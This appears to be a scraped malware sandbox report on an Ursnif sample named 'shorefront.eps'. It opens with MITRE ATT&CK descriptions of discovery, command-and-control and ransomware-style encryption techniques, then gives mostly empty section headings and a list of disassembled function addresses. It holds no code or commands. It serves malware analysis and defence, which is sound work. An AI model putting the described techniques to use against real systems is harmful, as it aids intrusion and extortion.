Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report shorefront.eps

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Function 00504E9C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Function 005035A1, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Function 00503946, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
memoryCOMMON

Function 6C501979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00503CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 6C5018D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6C501566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 6C501F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6C501B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00506DB7, Relevance: 33.3, APIs: 22, Instructions: 263
memorystringCOMMON

Function 00501B47, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Function 6C5017A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 00502D63, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
memoryCOMMON

Function 005057AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00501041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00504430, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Function 00505AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Function 6C501AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6C501E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6C501CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6C5015A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 00505988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Function 6C501D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 00507471, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112
COMMON

Function 00504A3C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 0050243C, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Function 6C501030, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 6C5016EC, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Function 0050274E, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Function 0050779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON